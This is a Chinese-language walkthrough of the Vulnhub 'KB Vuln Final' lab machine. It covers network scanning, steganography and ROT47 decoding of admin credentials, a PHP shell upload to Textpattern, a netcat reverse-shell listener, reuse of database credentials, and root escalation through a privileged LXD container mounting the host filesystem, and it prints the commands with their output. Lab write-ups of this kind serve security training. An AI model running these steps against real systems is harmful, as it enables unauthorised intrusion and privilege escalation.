KB Vuln Final
作者: jason huawen
识别目标主机IP地址
─(kali㉿kali)-[~/Desktop/Vulnhub/KBVuln4]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:ab:da:3f 1 60 PCS Systemtechnik GmbH
192.168.56.184 08:00:27:0e:f6:a9 1 60 PCS Systemtechnik GmbH
利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.184
NMAP扫描
──(kali㉿kali)-[~/Desktop/Vulnhub/KBVuln4]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.184 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-04-11 22:15 EDT
Nmap scan report for localhost (192.168.56.184)
Host is up (0.00013s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 cd:15:fb:cc:47:de:a3:16:e9:b8:6b:61:7a:25:5a:b7 (RSA)
| 256 82:a5:1b:08:06:12:c0:36:38:e7:53:18:47:ea:3f:f8 (ECDSA)
|_ 256 f4:d9:65:bd:7d:68:03:31:c3:64:06:48:1d:fb:e7:47 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Hacked!
| http-git:
| 192.168.56.184:80/.git/
| Git repository found!
| .gitignore matched patterns 'bug'
| Repository description: Unnamed repository; edit this file 'description' to name the...
| Last commit message: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN...
| Remotes:
| https://github.com/textpattern/textpattern.git
|_ Project type: node.js application (guessed from .gitignore)
MAC Address: 08:00:27:0E:F6:A9 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.37 seconds
NMAP扫描结果表明目标主机有2个开放端口:22(ssh)、80(http),并且nmap扫描结果可知目标主机站点有.git/目录。
获得Shell
┌──(kali㉿kali)-[~/Desktop/Vulnhub/KBVuln4]
└─$ gobuster dir -u http://192.168.56.184 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.sh,.js,.txt --exclude-length 10333
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.184
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] Exclude Length: 10333
[+] User Agent: gobuster/3.5
[+] Extensions: php,html,sh,js,txt
[+] Timeout: 10s
===============================================================
2023/04/11 22:20:55 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/images (Status: 301) [Size: 317] [--> http://192.168.56.184/images/]
/files (Status: 301) [Size: 316] [--> http://192.168.56.184/files/]
/themes (Status: 301) [Size: 317] [--> http://192.168.56.184/themes/]
/sites (Status: 301) [Size: 316] [--> http://192.168.56.184/sites/]
/README.txt (Status: 200) [Size: 1152]
/INSTALL.txt (Status: 200) [Size: 3094]
/LICENSE.txt (Status: 200) [Size: 15170]
/rpc (Status: 301) [Size: 314] [--> http://192.168.56.184/rpc/]
/HISTORY.txt (Status: 200) [Size: 70459]
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/UPGRADE.txt (Status: 200) [Size: 3492]
/server-status (Status: 403) [Size: 279]
Progress: 1034080 / 1323366 (78.14%)^C
[!] Keyboard interrupt detected, terminating.
Gosuter工具发现了/sites目录
浏览器访问80端口,访问/sites目录,并逐级进入下一层目录,
http://192.168.56.184/sites/site1/admin/
访问该目录,得知目标主机运行textpattern内容管理系统,因此访问:
http://192.168.56.184/textpattern
访问该URL,得到用户登录界面,查看页面源代码看到主机名kb.final,将其加入/etc/hosts文件中:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/KBVuln4]
└─$ sudo vim /etc/hosts
[sudo] password for kali:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/KBVuln4]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
192.168.56.184 kb.final
其实作者在首页就给出提示search me: machineboy141
利用搜索引擎搜索该黑客
https://github.com/machineboy141/KB-DUMP
将文件下载到Kali Linux
┌──(kali㉿kali)-[~/Desktop/Vulnhub/KBVuln4/KB-DUMP]
└─$ steghide extract -sf yunus.jpg
Enter passphrase:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/KBVuln4/KB-DUMP]
└─$ stegseek yunus.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Found passphrase: ""
[i] Original filename: "steganopayload1125574.txt".
[i] Extracting to "yunus.jpg.out".
┌──(kali㉿kali)-[~/Desktop/Vulnhub/KBVuln4/KB-DUMP]
└─$ steghide extract -sf serpil.jpg
Enter passphrase:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/KBVuln4/KB-DUMP]
└─$ stegseek serpil.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Progress: 99.72% (133.1 MB)
[!] error: Could not find a valid passphrase.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/KBVuln4/KB-DUMP]
└─$ steghide extract -sf omer.jpg
Enter passphrase:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/KBVuln4/KB-DUMP]
└─$ stegseek omer.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Found passphrase: ""
[i] Original filename: "steganopayload202720.txt".
[i] Extracting to "omer.jpg.out".
┌──(kali㉿kali)-[~/Desktop/Vulnhub/KBVuln4/KB-DUMP]
└─$ steghide extract -sf mehmet.jpg
Enter passphrase:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/KBVuln4/KB-DUMP]
└─$ stegseek mehmet.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Progress: 99.94% (133.4 MB)
[!] error: Could not find a valid passphrase.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/KBVuln4/KB-DUMP]
└─$ steghide extract -sf emre.jpg
Enter passphrase:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/KBVuln4/KB-DUMP]
└─$ stegseek emre.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Found passphrase: ""
[i] Original filename: "steganopayload1125546.txt".
[i] Extracting to "emre.jpg.out".
┌──(kali㉿kali)-[~/Desktop/Vulnhub/KBVuln4/KB-DUMP]
└─$ steghide extract -sf elif.jpg
Enter passphrase:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/KBVuln4/KB-DUMP]
└─$ stegseek elif.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Progress: 99.89% (133.3 MB)
[!] error: Could not find a valid passphrase.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/KBVuln4/KB-DUMP]
└─$ steghide extract -sf deniz.jpg
Enter passphrase:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/KBVuln4/KB-DUMP]
└─$ stegseek deniz.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Progress: 99.77% (133.1 MB)
[!] error: Could not find a valid passphrase.
其中有3个图片可破解出隐写信息
┌──(kali㉿kali)-[~/Desktop/Vulnhub/KBVuln4/KB-DUMP]
└─$ cat yunus.jpg.out
http://kb.final/textpattern/
┌──(kali㉿kali)-[~/Desktop/Vulnhub/KBVuln4/KB-DUMP]
└─$ cat omer.jpg.out
25>:?
┌──(kali㉿kali)-[~/Desktop/Vulnhub/KBVuln4/KB-DUMP]
└─$ cat emre.jpg.out
6K3:C4:>6a_a_
用网站识别加密算法
https://www.dcode.fr/cipher-identifier
识别为ROT 47
界面得到:ezbircime2020 admin
用该密码登录http://kb.final/textpattern
密码应该是ezbircime2021
成功登陆textpattern管理后台,然后将shell.php上传
shell.php应该在/files/目录下
http://kb.final/files/shell.php
┌──(kali㉿kali)-[~/Desktop/Vulnhub/KBVuln4/KB-DUMP]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.230] from (UNKNOWN) [192.168.56.184] 41448
Linux kb-server 4.15.0-134-generic #138-Ubuntu SMP Fri Jan 15 10:52:18 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
03:07:18 up 59 min, 0 users, load average: 0.00, 0.02, 0.98
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ which python
/usr/bin/python
这样就得到了目标主机反弹回来的shell
ww-data@kb-server:/var/www/html/textpattern/textpattern$ cat config.php
cat config.php
<?php
$txpcfg['db'] = 'textpattern';
$txpcfg['user'] = 'textuser';
$txpcfg['pass'] = 'ghostroot510';
$txpcfg['host'] = 'localhost';
$txpcfg['table_prefix'] = '';
$txpcfg['txpath'] = '/var/www/html/textpattern/textpattern';
$txpcfg['dbcharset'] = 'utf8mb4';
// For more customization options, please consult config-dist.php file.
www-data@kb-server:/var/www/html/textpattern/textpattern$ cd /home
cd /home
www-data@kb-server:/home$ ls
ls
machineboy
www-data@kb-server:/home$ su - machineboy
su - machineboy
Password: ghostroot510
发现数据库连接的密码就是machineboy的密码,成功切换
提权
machineboy@kb-server:~$ id
id
uid=1000(machineboy) gid=1000(machineboy) groups=1000(machineboy),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
可以利用lxd进行提权
┌──(kali㉿kali)-[~/Desktop/Vulnhub/KBVuln4]
└─$ git clone https://github.com/saghul/lxd-alpine-builder.git
Cloning into 'lxd-alpine-builder'...
remote: Enumerating objects: 50, done.
remote: Counting objects: 100% (8/8), done.
remote: Compressing objects: 100% (6/6), done.
remote: Total 50 (delta 2), reused 5 (delta 2), pack-reused 42
Receiving objects: 100% (50/50), 3.11 MiB | 2.07 MiB/s, done.
Resolving deltas: 100% (15/15), done.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/KBVuln4]
└─$ ls
GitHack GitHack.py KB-DUMP lxd-alpine-builder nmap_full_scan
┌──(kali㉿kali)-[~/Desktop/Vulnhub/KBVuln4]
└─$ cd lxd-alpine-builder
machineboy@kb-server:/tmp$ wget http://192.168.56.230:8000/alpine-v3.13-x86_64-20210218_0139.tar.gz
--2023-04-12 03:24:57-- http://192.168.56.230:8000/alpine-v3.13-x86_64-20210218_0139.tar.gz
Connecting to 192.168.56.230:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3259593 (3.1M) [application/gzip]
Saving to: ‘alpine-v3.13-x86_64-20210218_0139.tar.gz’
alpine-v3.13-x86_64-20210218_0139.tar.g 100%[============================================================================>] 3.11M --.-KB/s in 0.02s
2023-04-12 03:24:57 (190 MB/s) - ‘alpine-v3.13-x86_64-20210218_0139.tar.gz’ saved [3259593/3259593]
machineboy@kb-server:/tmp$ lxc image import ./alpine-v3.13-x86_64-20210218_0139.tar.gz --alias myimage
If this is your first time running LXD on this machine, you should also run: lxd init
To start your first container, try: lxc launch ubuntu:18.04
Image imported with fingerprint: cd73881adaac667ca3529972c7b380af240a9e3b09730f8c8e4e6a23e1a7892b
machineboy@kb-server:/tmp$ lxc image list
+---------+--------------+--------+-------------------------------+--------+--------+------------------------------+
| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCH | SIZE | UPLOAD DATE |
+---------+--------------+--------+-------------------------------+--------+--------+------------------------------+
| myimage | cd73881adaac | no | alpine v3.13 (20210218_01:39) | x86_64 | 3.11MB | Apr 12, 2023 at 3:25am (UTC) |
+---------+--------------+--------+-------------------------------+--------+--------+------------------------------+
machineboy@kb-server:/tmp$ lxc init myimage ignite -c security.privileged=true
Creating ignite
Error: No storage pool found. Please create a new storage pool
machineboy@kb-server:/tmp$ lxd init
Would you like to use LXD clustering? (yes/no) [default=no]:
Do you want to configure a new storage pool? (yes/no) [default=yes]:
Name of the new storage pool [default=default]:
Name of the storage backend to use (btrfs, dir, lvm) [default=btrfs]:
Create a new BTRFS pool? (yes/no) [default=yes]:
Would you like to use an existing block device? (yes/no) [default=no]:
Size in GB of the new loop device (1GB minimum) [default=15GB]:
Would you like to connect to a MAAS server? (yes/no) [default=no]:
Would you like to create a new local network bridge? (yes/no) [default=yes]:
What should the new bridge be called? [default=lxdbr0]:
What IPv4 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]:
What IPv6 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]:
Would you like LXD to be available over the network? (yes/no) [default=no]:
Would you like stale cached images to be updated automatically? (yes/no) [default=yes]
Would you like a YAML "lxd init" preseed to be printed? (yes/no) [default=no]:
machineboy@kb-server:/tmp$ lxc init myimage ignite -c security.privileged=true
Creating ignite
machineboy@kb-server:/tmp$ lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
Device mydevice added to ignite
machineboy@kb-server:/tmp$ lxc start ignite
machineboy@kb-server:/tmp$ lxc exec ignite /bin/sh
~ # cd /mnt/root
/mnt/root # ls
bin etc lib lost+found proc snap tmp vmlinuz.old
boot home lib32 media root srv usr
cdrom initrd.img lib64 mnt run swap.img var
dev initrd.img.old libx32 opt sbin sys vmlinuz
/mnt/root # cd root
/mnt/root/root # ls -alh
total 32K
drwx------ 4 root root 4.0K Jan 24 2021 .
drwxr-xr-x 26 root root 4.0K Jan 24 2021 ..
-rw------- 1 root root 0 Jan 24 2021 .bash_history
-rw-r--r-- 1 root root 3.0K Apr 9 2018 .bashrc
drwxr-xr-x 3 root root 4.0K Jan 24 2021 .local
-rw------- 1 root root 145 Jan 24 2021 .mysql_history
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
drwx------ 2 root root 4.0K Jan 24 2021 .ssh
-rw------- 1 root root 240 Jan 24 2021 root.txt
/mnt/root/root # cat root.txt
________________
< congratulations >
----------------
\ ,__,
\ (oo)____
(__) )\
||--|| *
kernelblog.org
cdf323526dbbd53d572d485fdd37d518
/mnt/root/root #
至此拿到了root flag